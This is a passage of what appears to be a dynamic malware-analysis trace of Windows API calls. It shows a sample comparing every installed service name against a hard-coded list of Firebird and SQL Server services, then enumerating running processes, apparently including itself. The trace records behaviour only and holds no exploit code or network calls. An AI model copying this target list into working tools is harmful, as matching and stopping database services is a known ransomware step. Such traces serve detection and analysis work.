lstrlenW (lpString="lfsvc") returned 5 [0196.538] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0196.538] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0196.538] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0196.538] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0196.538] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0196.538] lstrlenW (lpString="LicenseManager") returned 14 [0196.538] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LicenseManager") returned -1 [0196.538] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LicenseManager") returned -1 [0196.538] lstrcmpiW (lpString1="sqlwriter", lpString2="LicenseManager") returned 1 [0196.538] lstrcmpiW (lpString1="mssqlserver", lpString2="LicenseManager") returned 1 [0196.538] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LicenseManager") returned 1 [0196.538] lstrlenW (lpString="lmhosts") returned 7 [0196.538] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0196.538] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0196.538] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0196.538] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0196.538] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0196.538] lstrlenW (lpString="LSM") returned 3 [0196.538] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0196.538] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0196.538] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0196.538] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0196.538] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0196.538] lstrlenW (lpString="MpsSvc") returned 6 [0196.538] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0196.538] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0196.539] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0196.539] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0196.539] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0196.539] lstrlenW (lpString="NcbService") returned 10 [0196.539] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0196.539] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0196.539] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0196.539] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0196.539] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0196.539] lstrlenW (lpString="netprofm") returned 8 [0196.539] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0196.539] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0196.539] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0196.539] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0196.539] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0196.539] lstrlenW (lpString="NlaSvc") returned 6 [0196.539] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0196.539] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0196.539] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0196.539] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0196.539] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0196.539] lstrlenW (lpString="nsi") returned 3 [0196.539] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0196.539] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0196.539] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0196.539] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0196.539] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0196.540] lstrlenW (lpString="PcaSvc") returned 6 [0196.540] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0196.540] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0196.540] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0196.540] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0196.540] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0196.540] lstrlenW (lpString="PlugPlay") returned 8 [0196.540] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0196.540] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0196.540] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0196.540] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0196.540] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0196.540] lstrlenW (lpString="Power") returned 5 [0196.540] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0196.540] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0196.540] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0196.540] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0196.540] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0196.540] lstrlenW (lpString="ProfSvc") returned 7 [0196.540] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0196.540] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0196.540] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0196.540] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0196.540] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0196.540] lstrlenW (lpString="RpcEptMapper") returned 12 [0196.540] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0196.540] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0196.540] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0196.540] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0196.541] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0196.541] lstrlenW (lpString="RpcSs") returned 5 [0196.541] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0196.541] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0196.541] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0196.541] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0196.541] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0196.541] lstrlenW (lpString="SamSs") returned 5 [0196.541] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0196.541] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0196.541] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0196.541] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0196.541] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0196.541] lstrlenW (lpString="Schedule") returned 8 [0196.541] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0196.541] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0196.541] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0196.541] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0196.541] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0196.541] lstrlenW (lpString="SecurityHealthService") returned 21 [0196.541] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0196.541] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0196.541] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0196.541] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0196.541] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0196.541] lstrlenW (lpString="SENS") returned 4 [0196.541] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0196.541] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0196.542] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0196.542] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0196.542] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0196.542] lstrlenW (lpString="ShellHWDetection") returned 16 [0196.542] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0196.542] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0196.542] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0196.542] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0196.542] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0196.542] lstrlenW (lpString="Spooler") returned 7 [0196.542] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0196.542] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0196.542] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0196.542] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0196.542] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0196.542] lstrlenW (lpString="sppsvc") returned 6 [0196.542] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="sppsvc") returned -1 [0196.542] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="sppsvc") returned -1 [0196.542] lstrcmpiW (lpString1="sqlwriter", lpString2="sppsvc") returned 1 [0196.542] lstrcmpiW (lpString1="mssqlserver", lpString2="sppsvc") returned -1 [0196.542] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="sppsvc") returned 1 [0196.542] lstrlenW (lpString="SSDPSRV") returned 7 [0196.542] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SSDPSRV") returned -1 [0196.542] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SSDPSRV") returned -1 [0196.542] lstrcmpiW (lpString1="sqlwriter", lpString2="SSDPSRV") returned -1 [0196.542] lstrcmpiW (lpString1="mssqlserver", lpString2="SSDPSRV") returned -1 [0196.542] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x410 [0197.043] Process32FirstW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0197.044] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0197.045] lstrlenW (lpString="System") returned 6 [0197.045] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0197.046] lstrlenW (lpString="smss.exe") returned 8 [0197.046] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0197.047] lstrlenW (lpString="csrss.exe") returned 9 [0197.047] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0197.048] lstrlenW (lpString="wininit.exe") returned 11 [0197.048] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0197.049] lstrlenW (lpString="csrss.exe") returned 9 [0197.049] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0197.050] lstrlenW (lpString="winlogon.exe") returned 12 [0197.050] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0197.051] lstrlenW (lpString="services.exe") returned 12 [0197.051] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0197.052] lstrlenW (lpString="lsass.exe") returned 9 [0197.052] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.053] lstrlenW (lpString="svchost.exe") returned 11 [0197.053] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0197.054] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0197.054] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0197.055] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0197.055] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.056] lstrlenW (lpString="svchost.exe") returned 11 [0197.057] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0197.057] lstrlenW (lpString="dwm.exe") returned 7 [0197.058] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5c, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.058] lstrlenW (lpString="svchost.exe") returned 11 [0197.059] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.060] lstrlenW (lpString="svchost.exe") returned 11 [0197.060] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.061] lstrlenW (lpString="svchost.exe") returned 11 [0197.061] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.062] lstrlenW (lpString="svchost.exe") returned 11 [0197.062] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.063] lstrlenW (lpString="svchost.exe") returned 11 [0197.063] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.064] lstrlenW (lpString="svchost.exe") returned 11 [0197.064] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.065] lstrlenW (lpString="svchost.exe") returned 11 [0197.065] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.066] lstrlenW (lpString="svchost.exe") returned 11 [0197.066] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.067] lstrlenW (lpString="svchost.exe") returned 11 [0197.067] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0197.068] lstrlenW (lpString="spoolsv.exe") returned 11 [0197.068] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.069] lstrlenW (lpString="svchost.exe") returned 11 [0197.070] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.070] lstrlenW (lpString="svchost.exe") returned 11 [0197.071] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0197.071] lstrlenW (lpString="audiodg.exe") returned 11 [0197.072] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0197.072] lstrlenW (lpString="sihost.exe") returned 10 [0197.073] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.073] lstrlenW (lpString="svchost.exe") returned 11 [0197.074] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0197.074] lstrlenW (lpString="taskhostw.exe") returned 13 [0197.075] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0197.345] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0197.346] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0197.565] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0197.565] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x39, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0197.566] lstrlenW (lpString="explorer.exe") returned 12 [0197.566] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0197.567] lstrlenW (lpString="Memory Compression") returned 18 [0197.567] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0197.568] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0197.568] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0197.569] lstrlenW (lpString="SearchUI.exe") returned 12 [0197.569] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0197.570] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0197.570] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0197.571] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0197.571] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0197.572] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0197.572] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0197.573] lstrlenW (lpString="UNPCampaignManager.exe") returned 22 [0197.573] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x9c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0197.574] lstrlenW (lpString="conhost.exe") returned 11 [0197.574] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="roof competitive.exe")) returned 1 [0197.575] lstrlenW (lpString="roof competitive.exe") returned 20 [0197.575] Process32NextW (in: hSnapshot=0x410, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, 